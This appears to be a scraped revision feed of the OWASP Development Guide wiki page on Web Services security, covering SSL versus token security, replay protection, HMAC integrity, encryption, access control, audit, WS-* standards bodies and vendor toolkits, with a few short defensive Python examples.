Here are just a few of the issues that hamper Web Services interaction: incompatible authentication and authorization models for users, the amount of trust between services themselves and the ways of establishing such trust, maintaining secure connections, and synchronization of user directories or otherwise exchanging users’ attributes. These issues will be briefly tackled in the following paragraphs.&lt;br /&gt;
&lt;br /&gt;
===Incompatible user access control models ===&lt;br /&gt;
&lt;br /&gt;
As explained earlier, in section 0, Web Services themselves do not include separate extensions for access control, relying instead on the existing security framework. What they do provide, however, are mechanisms for discovering and describing security requirements of a SOAP service (via WS-Policy), and for obtaining appropriate security credentials via WS-Trust based services.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Service trust ===&lt;br /&gt;
&lt;br /&gt;
In order to establish mutual trust between client and service, they have to satisfy each other’s policy requirements. A simple and popular model is mutual certificate authentication via SSL, but it is not scalable for open service models, and supports only one authentication type. Services that require more flexibility have to use pretty much the same access control mechanisms as with users to establish each other’s identities prior to engaging in a conversation.&lt;br /&gt;
&lt;br /&gt;
===Secure connections ===&lt;br /&gt;
&lt;br /&gt;
Once trust is established, it would be impractical to require its confirmation on each interaction. Instead, a secure client-server link is formed and maintained the entire time a client’s session is active. Again, the most popular mechanism today for maintaining such a link is SSL, but it is not a Web Service-specific mechanism, and it has a number of shortcomings when applied to SOAP communication, as explained in 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Synchronization of user directories ===&lt;br /&gt;
&lt;br /&gt;
This is a very acute problem when dealing with cross-domain applications, as user populations tend to change frequently among different domains. So, how does a service in domain B decide whether it is going to trust a user’s claim that he has already been authenticated in domain A? There are different aspects to this problem. The first is a common SSO mechanism, which implies that a user is known in both domains (through synchronization, or by some other means), and authentication tokens from one domain are acceptable in another. In the Web Services world, this would be accomplished by passing around a SAML or Kerberos token for the user. &lt;br /&gt;
&lt;br /&gt;
===Domain federation ===&lt;br /&gt;
&lt;br /&gt;
Another aspect of the problem arises when users are not shared across domains, and only the fact that a user with a certain ID has successfully authenticated in another domain is communicated, as would be the case with several large corporations which would like to form a partnership, but would be reluctant to share customers’ details. The decision to accept such a request is then based on inter-domain procedures, establishing special trust relationships and allowing for the exchange of such opaque tokens – an example of Federation relationships. Of those efforts, the most notable example is the Liberty Alliance project, which is now being used as a basis for the SAML 2.0 specifications. The work in this area is still far from complete, and most of the existing deployments are POC or internal pilot projects rather than real cross-company deployments, although LA’s website does list some case studies of large-scale projects.&lt;br /&gt;
&lt;br /&gt;
==Available Implementations ==&lt;br /&gt;
&lt;br /&gt;
It is important to realize from the beginning that no security standard by itself is going to provide security to the message exchanges – it is the installed implementations that will be assessing conformance of the incoming SOAP messages to the applicable standards, as well as appropriately securing the outgoing messages.&lt;br /&gt;
&lt;br /&gt;
===.NET – Web Service Extensions ===&lt;br /&gt;
&lt;br /&gt;
Since new standards are being developed at a rather quick pace, the .NET platform does not try to catch up immediately, but uses Web Service Extensions (WSE) instead. WSE, currently at version 2.0, adds development and runtime support for the latest Web Service security standards to the platform and development tools, even while they are still “work in progress”. Once standards mature, their support is incorporated into new releases of the .NET platform, which is what is going to happen when .NET 2.0 finally sees the world. The next release of WSE, 3.0, is going to coincide with the VS.2005 release and will take advantage of the latest innovations of the .NET 2.0 platform in the messaging and Web Application areas.&lt;br /&gt;
&lt;br /&gt;
Considering that Microsoft is one of the most active players in the Web Service security area and recognizing its influence in the industry, its WSE implementation is probably one of the most complete and up to date, and it is strongly advisable to run at least a quick interoperability check with WSE-secured .NET Web Service clients. If you have a Java-based Web Service, and the interoperability is a requirement (which is usually the case), in addition to the questions of security testing one needs to keep in mind the basic interoperability between Java and .NET Web Service data structures. &lt;br /&gt;
&lt;br /&gt;
This is especially important since current versions of .NET Web Service tools frequently do not cleanly handle WS-Security’s and related XML schemas as published by OASIS, so some creativity on the part of a Web Service designer is needed. That said, the WSE package itself contains very rich and well-structured functionality, which can be utilized both with ASP.NET-based and standalone Web Service clients to check incoming SOAP messages and secure outgoing ones at the infrastructure level, relieving Web Service programmers from having to know these details. Among other things, WSE 2.0 supports the most recent set of WS-Policy and WS-Security profiles, providing for basic message security, and WS-Trust with WS-SecureConversation. Those are needed for establishing secure exchanges and sessions – similar to what SSL does at the transport level, but applied to message-based communication.&lt;br /&gt;
&lt;br /&gt;
===Java toolkits ===&lt;br /&gt;
&lt;br /&gt;
Most of the publicly available Java toolkits work at the level of XML security, i.e. XML-dsig and XML-enc – such as IBM’s XML Security Suite and Apache’s XML Security Java project. Java’s JSR 105 and JSR 106 (still not finalized) define Java bindings for signatures and encryption, which will allow plugging implementations in as JCA providers once work on those JSRs is completed. &lt;br /&gt;
&lt;br /&gt;
Moving one level up, to address Web Services themselves, the picture becomes muddier – at the moment, there are many implementations in various stages of incompleteness. For instance, Apache is currently working on the WSS4J project, which is moving rather slowly, and there is a commercial software package from Phaos (now owned by Oracle), which suffers from a lot of implementation problems.&lt;br /&gt;
&lt;br /&gt;
A popular choice among Web Service developers today is Sun’s JWSDP, which includes support for Web Service security. However, its support for the Web Service security specifications in version 1.5 is limited to an implementation of the core WSS standard with the username and X.509 certificate profiles. Security features are implemented as part of the JAX-RPC framework and are configuration-driven, which allows for a clean separation from the Web Service’s implementation.&lt;br /&gt;
&lt;br /&gt;
===Hardware, software systems ===&lt;br /&gt;
&lt;br /&gt;
This category includes complete systems, rather than toolkits or frameworks. On the one hand, they usually provide rich functionality right off the shelf; on the other hand, their usage model is rigidly constrained by the solution’s architecture and implementation. This is in contrast to the toolkits, which do not provide any services by themselves, but hand system developers the necessary tools to include the desired Web Service security features in their products… or to shoot themselves in the foot by applying them inappropriately.&lt;br /&gt;
&lt;br /&gt;
These systems can be used at the infrastructure layer to verify incoming messages against the effective policy, checking signatures, tokens, etc., before passing them on to the target Web Service. When applied to the outgoing SOAP messages, they act as a proxy, altering the messages to decorate them with the required security elements, and signing and/or encrypting them.&lt;br /&gt;
&lt;br /&gt;
Software systems are characterized by significant configuration flexibility, but comparatively slow processing. On the bright side, they often provide a high level of integration with the existing enterprise infrastructure, relying on the back-end user and policy stores to look at the credentials extracted from the WSS header from a broader perspective. An example of such a service is TransactionMinder from the former Netegrity – a Policy Enforcement Point for the Web Services behind it, layered on top of the Policy Server, which makes policy decisions by checking the extracted credentials against the configured stores and policies.&lt;br /&gt;
&lt;br /&gt;
For hardware systems, performance is the key – they have already broken the gigabyte processing threshold, and allow for real-time processing of huge documents, decorated according to a variety of the latest Web Service security standards, not only WSS. Usage simplicity is another attractive point of these systems – in the most trivial cases, the hardware box may literally be dropped in, plugged in, and used right away. These qualities come with a price, however – the performance and simplicity can be achieved only as long as the user stays within the pre-configured confines of the hardware box. The moment he tries to integrate with the back-end stores via callbacks (for those solutions that have this capability, since not all of them do), most of the advantages are lost. As an example of such a hardware device, Layer 7 Technologies provides the scalable SecureSpan Networking Gateway, which acts both as an inbound firewall and an outbound proxy to handle XML traffic in real time.&lt;br /&gt;
&lt;br /&gt;
==Problems ==&lt;br /&gt;
&lt;br /&gt;
As is probably clear from the previous sections, Web Services are still experiencing a lot of turbulence, and it will take a while before they can really catch on. Here is a brief look at what problems surround currently existing security standards and their implementations.&lt;br /&gt;
&lt;br /&gt;
===Immaturity of the standards ===&lt;br /&gt;
&lt;br /&gt;
Most of the standards are either very recent (a couple of years old at most) or still being developed. Although standards development is done in committees, which, presumably, reduces risks by going through an exhaustive reviewing and commenting process, some error scenarios still slip in periodically, as no theory can possibly match the testing that results from pounding by thousands of developers working in the field. &lt;br /&gt;
&lt;br /&gt;
Additionally, it does not help that for political reasons some of these standards are withheld from public process, which is the case with many standards from the WSA arena (see 0), or that some of the efforts are duplicated, as was the case with LA and WS-Federation specifications.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Performance ===&lt;br /&gt;
&lt;br /&gt;
XML parsing is a slow task, which is an accepted reality, and SOAP processing slows it down even more. Now, with expensive cryptographic and textual conversion operations thrown into the mix, these tasks become a performance bottleneck, even with the latest crypto- and XML-processing hardware solutions offered today. All of the products currently on the market are facing this issue, and they are trying to resolve it with varying degrees of success. &lt;br /&gt;
&lt;br /&gt;
Hardware solutions, while substantially (by orders of magnitude) improving the performance, cannot always be used as an optimal solution, as they cannot be easily integrated with the already existing back-end software infrastructure – at least, not without making performance sacrifices. Another consideration in whether hardware-based systems are the right solution is that they are usually highly specialized in what they do, while modern Application Servers and security frameworks can usually offer a much greater variety of protection mechanisms, protecting not only Web Services, but also other deployed applications in a uniform and consistent way.&lt;br /&gt;
&lt;br /&gt;
===Complexity and interoperability ===&lt;br /&gt;
&lt;br /&gt;
As could be deduced from the previous sections, Web Service security standards are fairly complex and have a very steep learning curve associated with them. Most of the current products dealing with Web Service security suffer from very mediocre usability due to the complexity of the underlying infrastructure. Configuring all the different policies, identities, keys, and protocols takes a lot of time and a good understanding of the involved technologies, as most of the time the errors that end users see have very cryptic and misleading descriptions. &lt;br /&gt;
&lt;br /&gt;
In order to help administrators and reduce security risks from service misconfigurations, many companies develop policy templates, which group together best practices for protecting incoming and outgoing SOAP messages. Unfortunately, this work is not currently on the radar of any of the standards bodies, so it appears unlikely that such templates will be released for public use any time soon. Closest to this effort may be WS-I’s Basic Security Profile (BSP), which tries to define the rules for better interoperability among Web Services, using a subset of common security features from various security standards like WSS. However, this work is not aimed at supplying administrators with ready-for-deployment security templates matching the most popular business use cases, but rather at establishing the least common denominator.&lt;br /&gt;
&lt;br /&gt;
===Key management ===&lt;br /&gt;
&lt;br /&gt;
Key management usually lies at the foundation of any other security activity, as most protection mechanisms rely on cryptographic keys one way or another. While Web Services have the XKMS protocol for key distribution, local key management still presents a huge challenge in most cases, since the PKI mechanism has a lot of well-documented deployment and usability issues. Those systems that opt to use homegrown mechanisms for key management run significant risks in many cases, since the questions of storing, updating, and recovering secret and private keys more often than not are not adequately addressed in such solutions.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* SearchSOA, SOA needs practical operational governance, Toufic Boubez&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://searchsoa.techtarget.com/news/interview/0,289202,sid26_gci1288649,00.html?track=NL-110&amp;amp;ad=618937&amp;amp;asrc=EM_NLN_2827289&amp;amp;uid=4724698&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Whitepaper: Securing XML Web Services: XML Firewalls and XML VPNs&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://layer7tech.com/new/library/custompage.html?id=4&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* eBizQ, The Challenges of SOA Security, Peter Schooff&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ebizq.net/blogs/news_security/2008/01/the_complexity_of_soa_security.php&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Piliptchouk, D., WS-Security in the Enterprise, O’Reilly ONJava&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/02/09/wssecurity.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/03/30/wssecurity2.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* WS-Security OASIS site&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=wss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Microsoft, ''What’s new with WSE 3.0''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/webservices/webservices/building/wse/default.aspx?pull=/library/en-us/dnwse/html/newwse3.asp&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Eoin Keary, Preventing DOS attacks on web services&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;https://www.threatsandcountermeasures.com/wiki/default.aspx/ThreatsAndCountermeasuresCommunityKB.PreventingDOSAttacksOnWebServices&amp;lt;/u&amp;gt;&lt;br /&gt;
[[category:FIXME | broken link]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Web Services]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59469</id>
		<title>Web Services</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59469"/>
				<updated>2009-04-26T11:57:03Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Referencing message parts */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
[[Category:FIXME|This article has a lot of what I think are placeholders for references. It says &amp;quot;see section 0&amp;quot; and I think those are intended to be replaced with actual sections. I have noted them where I have found them. Need to figure out what those intended to reference, and change the reference]]&lt;br /&gt;
This section of the Development Guide details the common issues facing Web Services developers, and methods to address them. Due to space limitations, it cannot look at all of the surrounding issues in great detail, since each of them deserves a separate book of its own. Instead, an attempt is made to steer the reader to the appropriate usage patterns, and to warn about potential roadblocks on the way.&lt;br /&gt;
&lt;br /&gt;
Web Services have received a lot of press, and with that comes a great deal of confusion over what they really are. Some are heralding Web Services as the biggest technology breakthrough since the web itself; others are more skeptical, seeing them as nothing more than evolved web applications. In either case, the issues of web application security apply to web services just as they do to web applications. &lt;br /&gt;
&lt;br /&gt;
==What are Web Services?==&lt;br /&gt;
&lt;br /&gt;
Suppose you were making an application that you wanted other applications to be able to communicate with.  For example, your Java application has stock information updated every 5 minutes and you would like other applications, ones that may not even exist yet, to be able to use the data.&lt;br /&gt;
&lt;br /&gt;
One way you can do this is to serialize your Java objects and send them over the wire to the application that requests them.  The problem with this approach is that a C# application would not be able to use these objects because it serializes and deserializes objects differently than Java.  &lt;br /&gt;
&lt;br /&gt;
Another approach you could take is to send a text file filled with data to the application that requests it.  This is better because a C# application could read the data.  But this approach has another flaw: let's assume your stock application is not the only one the C# application needs to interact with.  Maybe it needs weather data, local restaurant data, movie data, etc.  If every one of these applications uses its own unique file format, it would take considerable research to get the C# application to a working state.  &lt;br /&gt;
&lt;br /&gt;
The solution to both of these problems is to send a standard file format – one that any application can use, regardless of the data being transported.  Web Services are this solution.  They let any application communicate with any other application without having to consider the language it was developed in or the format of the data.  &lt;br /&gt;
&lt;br /&gt;
At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation tier level. While web applications typically are HTML-based, web services are XML-based. Interactive users for B2C (business to consumer) transactions normally access web applications, while web services are employed as building blocks by other web applications for forming B2B (business to business) chains using the so-called SOA model. Web services typically present a public functional interface, callable in a programmatic fashion, while web applications tend to deal with a richer set of features and are content-driven in most cases. &lt;br /&gt;
&lt;br /&gt;
==Securing Web Services ==&lt;br /&gt;
&lt;br /&gt;
Web services, like other distributed applications, require protection at multiple levels:&lt;br /&gt;
&lt;br /&gt;
* SOAP messages that are sent on the wire should be delivered confidentially and without tampering&lt;br /&gt;
&lt;br /&gt;
* The server needs to be confident who it is talking to and what the clients are entitled to&lt;br /&gt;
&lt;br /&gt;
* The clients need to know that they are talking to the right server, and not a phishing site (see the Phishing chapter for more information)&lt;br /&gt;
&lt;br /&gt;
* System message logs should contain sufficient information to reliably reconstruct the chain of events and track those back to the authenticated callers&lt;br /&gt;
&lt;br /&gt;
Correspondingly, the high-level approaches to solutions, discussed in the following sections, are valid for pretty much any distributed application, with some variations in the implementation details.&lt;br /&gt;
&lt;br /&gt;
The good news for Web Services developers is that these are infrastructure-level tasks, so, theoretically, it is only the system administrators who should be worrying about these issues. However, for a number of reasons discussed later in this chapter, WS developers usually have to be at least aware of all these risks, and oftentimes they still have to resort to manually coding or tweaking the protection components.&lt;br /&gt;
&lt;br /&gt;
==Communication security ==&lt;br /&gt;
&lt;br /&gt;
There is a commonly cited statement, and even more often implemented approach – “we are using SSL to protect all communication, we are secure”. At the same time, there have been so many articles published on the topic of “channel security vs. token security” that it hardly makes sense to repeat those arguments here. Therefore, listed below is just a brief rundown of most common pitfalls when using channel security alone:&lt;br /&gt;
&lt;br /&gt;
* It provides only “point-to-point” security&lt;br /&gt;
&lt;br /&gt;
Any communication with multiple “hops” requires establishing separate channels (and trusts) between each communicating node along the way. There is also a subtle issue of trust transitivity, as trusts between node pairs {A,B} and {B,C} do not automatically imply an {A,C} trust relationship.&lt;br /&gt;
&lt;br /&gt;
* Storage issue&lt;br /&gt;
&lt;br /&gt;
After messages are received on the server (even if it is not the intended recipient), they exist in clear-text form, at least temporarily. Storing the transmitted information in log files (where it can be browsed by anybody) and local caches at the intermediate or destination servers aggravates the problem.&lt;br /&gt;
&lt;br /&gt;
* Lack of interoperability&lt;br /&gt;
&lt;br /&gt;
While SSL provides a standard mechanism for transport protection, applications then have to utilize highly proprietary mechanisms for transmitting credentials, ensuring freshness, integrity, and confidentiality of data sent over the secure channel. Using a different server, which is semantically equivalent, but accepts a different format of the same credentials, would require altering the client and prevent forming automatic B2B service chains. &lt;br /&gt;
&lt;br /&gt;
Standards-based token protection in many cases provides a superior alternative for the message-oriented Web Service SOAP communication model.&lt;br /&gt;
&lt;br /&gt;
That said – the reality is that most Web Services today are still protected by some form of channel security mechanism, which alone might suffice for a simple internal application. However, one should clearly realize the limitations of such an approach, and make conscious trade-offs at design time as to whether channel, token, or combined protection would work better for each specific case.&lt;br /&gt;
&lt;br /&gt;
==Passing credentials ==&lt;br /&gt;
&lt;br /&gt;
In order to enable credentials exchange and authentication for Web Services, their developers must address the following issues.&lt;br /&gt;
&lt;br /&gt;
First, since SOAP messages are XML-based, all passed credentials have to be converted to text format. This is not a problem for username/password types of credentials, but binary ones (like X.509 certificates or Kerberos tokens) require converting them into text prior to sending and unambiguously restoring them upon receiving, which is usually done via a procedure called Base64 encoding and decoding.&lt;br /&gt;
&lt;br /&gt;
Second, passing credentials carries an inherent risk of their disclosure – either by sniffing them during the wire transmission, or by analyzing the server logs. Therefore, things like passwords and private keys need to be either encrypted, or just never sent “in the clear”. The usual ways to avoid sending sensitive credentials are cryptographic hashing and/or signatures.&lt;br /&gt;
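One widely used scheme of this kind is the password digest defined by the WSS Username Token Profile, where the client sends Base64(SHA-1(nonce + created + password)) rather than the password itself. A minimal Python sketch (the username and password here are placeholders):

```python
import base64
import hashlib
import os
from datetime import datetime, timezone

def username_token(username: str, password: str) -> dict:
    """Build a WSS UsernameToken-style password digest:
    Base64(SHA-1(nonce + created + password)), so the clear-text
    password never travels on the wire."""
    nonce = os.urandom(16)
    created = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    digest = hashlib.sha1(nonce + created.encode() + password.encode()).digest()
    return {
        "Username": username,
        "Nonce": base64.b64encode(nonce).decode("ascii"),
        "Created": created,
        "PasswordDigest": base64.b64encode(digest).decode("ascii"),
    }

# "alice"/"s3cret" are invented values for illustration.
token = username_token("alice", "s3cret")
```

The receiver, which knows the password, recomputes the digest from the transmitted Nonce and Created values and compares; the nonce and timestamp also double as replay protection.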
&lt;br /&gt;
==Ensuring message freshness ==&lt;br /&gt;
&lt;br /&gt;
Even a valid message may present a danger if it is utilized in a “replay attack” – i.e. it is sent multiple times to the server to make it repeat the requested operation. This may be achieved by capturing an entire message, even if it is sufficiently protected against tampering, since it is the message itself that is used for attack now (see the XML Injection section of the Interpreter Injection chapter).&lt;br /&gt;
&lt;br /&gt;
Usual means to protect against replayed messages is either using unique identifiers (nonces) on messages and keeping track of processed ones, or using a relatively short validity time window. In the Web Services world, information about the message creation time is usually communicated by inserting timestamps, which may just tell the instant the message was created, or have additional information, like its expiration time, or certain conditions.&lt;br /&gt;
&lt;br /&gt;
The latter solution, although easier to implement, requires clock synchronization and is sensitive to “server time skew”, where the server's or the clients' clocks drift too far apart and prevent timely message delivery; this usually does not present significant problems with modern-day computers. A greater issue lies with message queuing at the servers, where messages may expire while waiting to be processed in the queue of an especially busy or non-responsive server.&lt;br /&gt;
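The nonce-plus-validity-window approach can be sketched as follows; the class name and the five-minute window are illustrative choices, not anything mandated by a standard:

```python
import time

class ReplayGuard:
    """Reject messages whose nonce was already seen, or whose
    timestamp falls outside a short validity window."""

    def __init__(self, window_seconds: float = 300.0):
        self.window = window_seconds
        self.seen = {}  # nonce -> time it was first accepted

    def accept(self, nonce: str, created: float, now: float = None) -> bool:
        now = time.time() if now is None else now
        # Purge nonces older than the window so the cache stays bounded;
        # anything older would be rejected by the freshness check anyway.
        self.seen = {n: t for n, t in self.seen.items() if now - t < self.window}
        if abs(now - created) > self.window:
            return False  # stale (or future-dated) message
        if nonce in self.seen:
            return False  # replay of an already-processed message
        self.seen[nonce] = now
        return True

guard = ReplayGuard(window_seconds=300)
assert guard.accept("n1", created=1000.0, now=1001.0)        # fresh, new nonce
assert not guard.accept("n1", created=1000.0, now=1002.0)    # replayed nonce
assert not guard.accept("n2", created=1000.0, now=2000.0)    # outside the window
```

Note that purging by window is what makes nonce tracking practical: without an expiry bound, the server would have to remember every nonce forever.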
&lt;br /&gt;
==Protecting message integrity ==&lt;br /&gt;
&lt;br /&gt;
When a message is received by a web service, the service must always ask two questions: “do I trust the caller?” and “did the caller create this message?” Assuming that trust in the caller has been established one way or another, the server has to be assured that the message it is looking at was indeed issued by the caller, and not altered along the way (intentionally or not). Alterations may affect technical qualities of a SOAP message, such as the message’s timestamp, or its business content, such as the amount to be withdrawn from a bank account. Obviously, neither change should go undetected by the server.&lt;br /&gt;
&lt;br /&gt;
In communication protocols, there are usually mechanisms like checksums applied to ensure a packet’s integrity. This would not be sufficient, however, in the realm of publicly exposed Web Services, since checksums (or digests, their cryptographic equivalents) are easily replaceable and cannot be reliably traced back to the issuer. The required association may be established by utilizing HMAC, or by combining message digests with either cryptographic signatures or with secret-key encryption (assuming the keys are only known to the two communicating parties), so that any change will immediately result in a cryptographic error.&lt;br /&gt;
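The difference between a bare digest and a keyed HMAC can be illustrated with Python's standard library; the key and message contents below are, naturally, made up:

```python
import hashlib
import hmac

# Shared secret known only to the two communicating parties (assumed
# to have been established out of band).
key = b"shared-secret-key"

def tag(message: bytes) -> bytes:
    """A plain SHA-256 digest could simply be recomputed by an attacker
    after tampering; an HMAC cannot, because it mixes in the secret key."""
    return hmac.new(key, message, hashlib.sha256).digest()

msg = b"<Withdraw amount='100'/>"
mac = tag(msg)

# The receiver recomputes the tag and compares in constant time.
assert hmac.compare_digest(mac, tag(msg))
# Any alteration of the message invalidates the tag.
assert not hmac.compare_digest(mac, tag(b"<Withdraw amount='9000'/>"))
```

`hmac.compare_digest` is used instead of `==` so that the comparison does not leak timing information about how many leading bytes matched.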
&lt;br /&gt;
==Protecting message confidentiality ==&lt;br /&gt;
&lt;br /&gt;
Oftentimes, it is not sufficient to ensure integrity alone – in many cases it is also desirable that nobody can see the data that is passed around and/or stored locally. This may apply to the entire message being processed, or only to certain parts of it – in either case, some type of encryption is required to conceal the content. Normally, symmetric encryption algorithms are used to encrypt bulk data, since they are significantly faster than asymmetric ones. Asymmetric encryption is then applied to protect the symmetric session keys, which, in many implementations, are valid for one communication only and are subsequently discarded.&lt;br /&gt;
&lt;br /&gt;
Applying encryption requires extensive setup work, since the communicating parties now have to be aware of which keys they can trust, deal with certificate and key validation, and know which keys should be used for communication.&lt;br /&gt;
&lt;br /&gt;
In many cases, encryption is combined with signatures to provide both integrity and confidentiality. Normally, signing keys are different from the encrypting ones, primarily because of their different lifecycles – signing keys are permanently associated with their owners, while encryption keys may be invalidated after the message exchange. Another reason may be separation of business responsibilities - the signing authority (and the corresponding key) may belong to one department or person, while encryption keys are generated by the server controlled by members of IT department. &lt;br /&gt;
&lt;br /&gt;
==Access control ==&lt;br /&gt;
&lt;br /&gt;
After the message has been received and successfully validated, the server must decide:&lt;br /&gt;
&lt;br /&gt;
* Does it know who is requesting the operation (Identification)&lt;br /&gt;
&lt;br /&gt;
* Does it trust the caller’s identity claim (Authentication)&lt;br /&gt;
&lt;br /&gt;
* Does it allow the caller to perform this operation (Authorization)&lt;br /&gt;
&lt;br /&gt;
There is not much WS-specific activity that takes place at this stage – just several new ways of passing the credentials for authentication. Most often, authorization (or entitlement) tasks occur completely outside of the Web Service implementation, at the Policy Server that protects the whole domain.&lt;br /&gt;
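A toy illustration of the third question only – authorization – assuming identification and authentication have already happened (the policy table, caller names, and operation names are all invented; in practice this decision would be delegated to the external Policy Server):

```python
# Hypothetical policy table mapping authenticated callers to the
# operations they may invoke.
POLICY = {
    "alice": {"GetQuote"},
    "bob": {"GetQuote", "PlaceOrder"},
}

def authorize(caller: str, operation: str) -> bool:
    """Answer only the authorization question; the caller identity is
    assumed to come from an already-validated credential (e.g. a WSS
    token). Unknown callers get an empty permission set, so the check
    fails closed."""
    return operation in POLICY.get(caller, set())

assert authorize("bob", "PlaceOrder")
assert not authorize("alice", "PlaceOrder")   # known caller, forbidden op
assert not authorize("mallory", "GetQuote")   # unknown caller
```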
&lt;br /&gt;
There is another significant problem here – traditional HTTP firewalls do not help stop attacks on Web Services. An organization would need an XML/SOAP firewall, which is capable of conducting application-level analysis of the web server’s traffic and making intelligent decisions about passing SOAP messages to their destination. The reader will need to refer to other books and publications on this very important topic, as it is impossible to cover it within just one chapter.&lt;br /&gt;
&lt;br /&gt;
==Audit ==&lt;br /&gt;
&lt;br /&gt;
A common task, typically required by audits, is reconstructing the chain of events that led to a certain problem. Normally, this is achieved by saving server logs in a secure location, available only to the IT administrators and system auditors, in order to create what is commonly referred to as an “audit trail”. Web Services are no exception to this practice, and follow the general approach of other types of Web Applications.&lt;br /&gt;
&lt;br /&gt;
Another auditing goal is non-repudiation, meaning that a message can be verifiably traced back to the caller. Following the standard legal practice, electronic documents now require some form of an “electronic signature”, but its definition is extremely broad and can mean practically anything – in many cases, entering your name and birthday qualifies as an e-signature.&lt;br /&gt;
&lt;br /&gt;
As far as Web Services are concerned, such a level of protection would be insufficient and easily forgeable. The standard practice is to require cryptographic digital signatures over any content that has to be legally binding – if a document with such a signature is saved in the audit log, it can be reliably traced to the owner of the signing key. &lt;br /&gt;
&lt;br /&gt;
==Web Services Security Hierarchy ==&lt;br /&gt;
&lt;br /&gt;
Technically speaking, Web Services themselves are very simple and versatile – XML-based communication, described by an XML-based grammar, called Web Services Description Language (WSDL, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2005/WD-wsdl20-20050510&amp;lt;/u&amp;gt;), which binds abstract service interfaces, consisting of messages, expressed as XML Schema, and operations, to the underlying wire format. Although it is by no means a requirement, the format of choice is currently SOAP over HTTP. This means that Web Service interfaces are described in terms of the incoming and outgoing SOAP messages, transmitted over HTTP protocol.&lt;br /&gt;
&lt;br /&gt;
===Standards committees ===&lt;br /&gt;
&lt;br /&gt;
Before reviewing the individual standards, it is worth taking a brief look at the organizations which are developing and promoting them. There are quite a few industry-wide groups and consortiums working in this area, most important of which are listed below. &lt;br /&gt;
&lt;br /&gt;
W3C (see &amp;lt;u&amp;gt;http://www.w3.org&amp;lt;/u&amp;gt;) is the most well known industry group, which owns many Web-related standards and develops them in Working Group format. Of particular interest to this chapter are XML Schema, SOAP, XML-dsig, XML-enc, and WSDL standards (called recommendations in the W3C’s jargon).&lt;br /&gt;
&lt;br /&gt;
OASIS (see &amp;lt;u&amp;gt;http://www.oasis-open.org&amp;lt;/u&amp;gt;) mostly deals with Web Service-specific standards, not necessarily security-related. It also operates on a committee basis, forming so-called Technical Committees (TC) for the standards that it is going to be developing. Of interest for this discussion, OASIS owns WS-Security and SAML standards. &lt;br /&gt;
&lt;br /&gt;
Web Services Interoperability Organization (WS-I, see &amp;lt;u&amp;gt;http://www.ws-i.org/&amp;lt;/u&amp;gt;) was formed to promote a general framework for interoperable Web Services. Mostly its work consists of taking other broadly accepted standards, and developing so-called profiles, or sets of requirements for conforming Web Service implementations. In particular, its Basic Security Profile (BSP) relies on the OASIS’ WS-Security standard and specifies sets of optional and required security features in Web Services that claim interoperability.&lt;br /&gt;
&lt;br /&gt;
The Liberty Alliance (LA, see &amp;lt;u&amp;gt;http://projectliberty.org&amp;lt;/u&amp;gt;) consortium was formed to develop and promote an interoperable Identity Federation framework. Although this framework is general rather than strictly Web Service-specific, it is important for this topic because of its close relation to the SAML standard developed by OASIS. &lt;br /&gt;
&lt;br /&gt;
Besides the previously listed organizations, there are other industry associations, both permanently established and short-lived, which push forward various Web Service security activities. They are usually made up of the software industry’s leading companies, such as Microsoft, IBM, Verisign, BEA, Sun, and others, that join them to work on a particular issue or proposal. Results of these joint activities, once they reach a certain maturity, are often submitted to standards committees as a basis for new industry standards.&lt;br /&gt;
&lt;br /&gt;
==SOAP ==&lt;br /&gt;
&lt;br /&gt;
Simple Object Access Protocol (SOAP, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2003/REC-soap12-part1-20030624/&amp;lt;/u&amp;gt;) provides an XML-based framework for exchanging structured and typed information between peer services. This information, formatted into Header and Body, can theoretically be transmitted over a number of transport protocols, but only HTTP binding has been formally defined and is in active use today. SOAP provides for Remote Procedure Call-style (RPC) interactions, similar to remote function calls, and Document-style communication, with message contents based exclusively on XML Schema definitions in the Web Service’s WSDL. Invocation results may be optionally returned in the response message, or a Fault may be raised, which is roughly equivalent to using exceptions in traditional programming languages.&lt;br /&gt;
&lt;br /&gt;
